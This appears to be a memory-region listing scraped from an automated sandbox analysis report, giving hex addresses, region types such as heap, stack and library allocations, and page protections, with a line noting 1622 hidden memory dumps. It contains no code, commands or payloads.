heap
page read and write
2BEAFEE9000
heap
page read and write
8E3000
heap
page read and write
F770000
trusted library allocation
page read and write
8E3000
heap
page read and write
266D2F72000
heap
page read and write
7FF8B7E34000
unkown
page readonly
8A2A000
heap
page read and write
2BEAFAEE000
heap
page read and write
24E571F4000
heap
page read and write
266D2F72000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
8E3000
heap
page read and write
465F000
stack
page read and write
F21E000
heap
page read and write
9DE9000
heap
page read and write
2BEAD95C000
heap
page read and write
7FF8B7DE5000
unkown
page readonly
8EF000
heap
page read and write
2BEAD98E000
heap
page read and write
10619000
heap
page read and write
2BEAD9EA000
heap
page read and write
15B3000
heap
page read and write
220FC9C2000
heap
page read and write
2BEAFEE6000
heap
page read and write
6C7B000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
F750000
trusted library allocation
page read and write
2BEAD9EA000
heap
page read and write
1570000
heap
page read and write
8E3000
heap
page read and write
3027000
direct allocation
page read and write
7FF8A8AC1000
unkown
page readonly
9DC0000
trusted library allocation
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
2BEAFAEC000
heap
page read and write
2BEAFEF1000
heap
page read and write
7FF692A23000
unkown
page read and write
10726000
heap
page read and write
105E9000
heap
page read and write
6C76000
trusted library allocation
page read and write
8E3000
heap
page read and write
1233000
stack
page read and write
30EF000
direct allocation
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
46E000
unkown
page readonly
C860000
trusted library allocation
page read and write
220FCAAE000
heap
page read and write
2668000
unkown
page readonly
318D000
direct allocation
page read and write
266D2F80000
heap
page read and write
2BEAFB2C000
heap
page read and write
21881915000
trusted library allocation
page read and write
2BEAFA57000
heap
page read and write
2BEAFEE6000
heap
page read and write
F760000
trusted library allocation
page read and write
8E3000
heap
page read and write
266D2F7F000
heap
page read and write
1370000
heap
page read and write
6C70000
trusted library allocation
page read and write
7FF849177000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
447000
unkown
page readonly
1076C000
heap
page read and write
24E571FC000
heap
page read and write
B10000
heap
page read and write
2BEAFF01000
heap
page read and write
24E57007000
heap
page read and write
266D2F79000
heap
page read and write
302F000
direct allocation
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
F740000
trusted library allocation
page read and write
F780000
trusted library allocation
page read and write
218FB203000
heap
page read and write
6C76000
trusted library allocation
page read and write
2BEAFB2D000
heap
page read and write
2BEB01AA000
heap
page read and write
7FF8B78B5000
unkown
page readonly
8E4000
heap
page read and write
2BEAFB2C000
heap
page read and write
24E56FF7000
heap
page read and write
9D23000
heap
page read and write
2BEAD98D000
heap
page read and write
2BEAFB2F000
heap
page read and write
303D000
direct allocation
page read and write
2BEAFB2D000
heap
page read and write
312A000
direct allocation
page read and write
218F919D000
heap
page read and write
105E3000
heap
page read and write
2BEAFB2C000
heap
page read and write
3154000
direct allocation
page read and write
8E3000
heap
page read and write
7FF8B8C15000
unkown
page readonly
9F70000
trusted library allocation
page read and write
2BEAFA5A000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEF8000
heap
page read and write
8E3000
heap
page read and write
176E000
stack
page read and write
2BEAFF18000
heap
page read and write
8E3000
heap
page read and write
31CF000
direct allocation
page read and write
7FF849060000
trusted library allocation
page read and write
2BEAFEF8000
heap
page read and write
7FF8B93CB000
unkown
page readonly
7582000
trusted library allocation
page read and write
7FF692A0D000
unkown
page readonly
220FCAD9000
heap
page read and write
776A000
trusted library allocation
page read and write
DCF0000
trusted library allocation
page read and write
9C57000
heap
page read and write
2BEAFEF1000
heap
page read and write
2BEAFAF5000
heap
page read and write
2BEAFF18000
heap
page read and write
8E3000
heap
page read and write
9B18000
heap
page read and write
BD9477D000
stack
page read and write
31EC000
direct allocation
page read and write
2BEAFB2C000
heap
page read and write
7FF6929E0000
unkown
page readonly
8E3000
heap
page read and write
266D2F72000
heap
page read and write
310D000
direct allocation
page read and write
F740000
trusted library allocation
page read and write
2BEAFB2C000
heap
page read and write
266D2F80000
heap
page read and write
7FF8BA4F1000
unkown
page execute read
2BEAD94E000
heap
page read and write
F740000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
9CD2000
heap
page read and write
220FCB55000
heap
page read and write
7FF8B784B000
unkown
page readonly
8E3000
heap
page read and write
2A37000
unkown
page readonly
4306000
direct allocation
page read and write
266D2F79000
heap
page read and write
8E5000
heap
page read and write
24E56FC9000
heap
page read and write
266D2F79000
heap
page read and write
7FF848FF2000
trusted library allocation
page read and write
266D2F80000
heap
page read and write
419E000
stack
page read and write
6D60000
trusted library allocation
page read and write
BD9584D000
stack
page read and write
105BC000
heap
page read and write
FA5451C000
stack
page read and write
8E5000
heap
page read and write
F750000
trusted library allocation
page read and write
2BEB0BAA000
heap
page read and write
F740000
trusted library allocation
page read and write
7FF8A8AF1000
unkown
page readonly
7FF8B8F8E000
unkown
page readonly
3020000
direct allocation
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
2BEAD980000
heap
page read and write
BD949B8000
stack
page read and write
8E3000
heap
page read and write
DD20000
trusted library allocation
page read and write
8E3000
heap
page read and write
3071000
direct allocation
page read and write
266D2F72000
heap
page read and write
2BEAFA7D000
heap
page read and write
15FD000
heap
page read and write
218FB5B2000
heap
page read and write
8E3000
heap
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
7DF44A5C0000
trusted library allocation
page execute and read and write
15FD000
heap
page read and write
107E6000
heap
page read and write
7FF8B7E15000
unkown
page read and write
8E3000
heap
page read and write
7FF8B8CB1000
unkown
page execute read
9F40000
trusted library allocation
page read and write
7FF8B8793000
unkown
page readonly
DCF0000
trusted library allocation
page read and write
7FF8B78C2000
unkown
page readonly
30D2000
direct allocation
page read and write
1071F000
heap
page read and write
266D2F72000
heap
page read and write
8E3000
heap
page read and write
7FF692A20000
unkown
page write copy
7FF6929E1000
unkown
page execute read
2BEAFA00000
direct allocation
page read and write
7FF8BA255000
unkown
page read and write
2BEAFAD4000
heap
page read and write
7FF8B78A3000
unkown
page readonly
266D2F7F000
heap
page read and write
2BEAD94D000
heap
page read and write
7FF8B8F8A000
unkown
page read and write
2BEAFED1000
heap
page read and write
2BEAD983000
heap
page read and write
24E571C0000
heap
page read and write
266D2F79000
heap
page read and write
105B0000
heap
page read and write
2BEAFEE4000
heap
page read and write
7FF8B9F61000
unkown
page execute read
7626000
trusted library allocation
page read and write
2BEAD919000
heap
page read and write
2BEAFB2D000
heap
page read and write
C860000
trusted library allocation
page read and write
2BEAFB39000
heap
page read and write
7FF8491E2000
trusted library allocation
page read and write
17BF000
stack
page read and write
1596000
heap
page read and write
445000
unkown
page write copy
AD0000
heap
page read and write
475E000
stack
page read and write
2BEAF870000
direct allocation
page read and write
21890070000
trusted library allocation
page read and write
2BEAD9F3000
heap
page read and write
31C0000
direct allocation
page read and write
7FF849080000
trusted library allocation
page read and write
15C0000
heap
page read and write
7FF8B7830000
unkown
page readonly
15BA000
heap
page read and write
2BEAFAFD000
heap
page read and write
8E3000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEE4000
heap
page read and write
C83F000
heap
page read and write
218FB4A7000
heap
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
AD5000
heap
page read and write
6F28000
heap
page read and write
72FD000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
7FF848FC9000
trusted library allocation
page read and write
B671000
trusted library allocation
page read and write
105B4000
heap
page read and write
2BEAD981000
heap
page read and write
2BEAFEF1000
heap
page read and write
266D2F50000
heap
page read and write
2BEAFADC000
heap
page read and write
2BEAD9B8000
heap
page read and write
725C000
trusted library allocation
page read and write
3114000
direct allocation
page read and write
There are 1622 hidden memdumps, click here to show them.